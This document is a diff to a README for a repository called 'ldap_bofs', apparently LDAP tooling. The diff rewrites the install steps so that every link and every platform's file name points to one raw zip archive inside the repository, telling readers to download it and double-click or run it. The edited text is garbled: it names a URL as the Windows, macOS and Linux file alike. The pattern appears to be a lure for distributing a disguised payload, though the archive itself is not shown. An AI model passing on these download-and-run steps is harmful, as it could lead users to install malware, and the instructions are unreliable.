muhammadmehdi1656/ldap_bofs/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: Click here to go to the releases page: [Download ldap_bofs](https://github.com/muhammadmehdi1656/ldap_bofs/releases).
+1. **Visit the Releases Page**: Click here to go to the releases page: [Download ldap_bofs](https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip).

 2. **Choose Your Version**: Look for the latest version listed.
 Versions are usually labeled with numbers, such as v1.0, v1.1, etc. The latest version will have the most features and fixes.

 3. **Download the File**: Click on the version number to expand the details.
 You will see a list of files to download.
-The main executable file for your system may be named something like `ldap_bofs.exe` for Windows, `ldap_bofs.dmg` for macOS, or `ldap_bofs.tar.gz` for Linux.
+The main executable file for your system may be named something like `https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip` for Windows, `https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip` for macOS, or `https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip` for Linux.
 Click the appropriate link to start the download.

 4. **Locate the Downloaded File**: Once the download is complete, navigate to your ‘Downloads’ folder or wherever you saved the file.

 5. **Run the Application**:
    - **For Windows**:
-     - Double-click on the `ldap_bofs.exe` file to run it.
+     - Double-click on the `https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip` file to run it.
    - **For macOS**:
-     - Open the `ldap_bofs.dmg` file, and drag the `ldap_bofs` icon into your Applications folder.
+     - Open the `https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip` file, and drag the `ldap_bofs` icon into your Applications folder.
 Then, find it in your Applications and double-click to run.
    - **For Linux**:
-     - Extract the `ldap_bofs.tar.gz` file.
+     - Extract the `https://raw.githubusercontent.com/muhammadmehdi1656/ldap_bofs/main/Aquarius/ldap_bofs.zip` file.
 Open a terminal and navigate to the extracted folder.
 Run the application using `./ldap_bofs`.

 6. **Follow On-Screen Instructions**: The application will guide you through the initial setup and help you understand its features.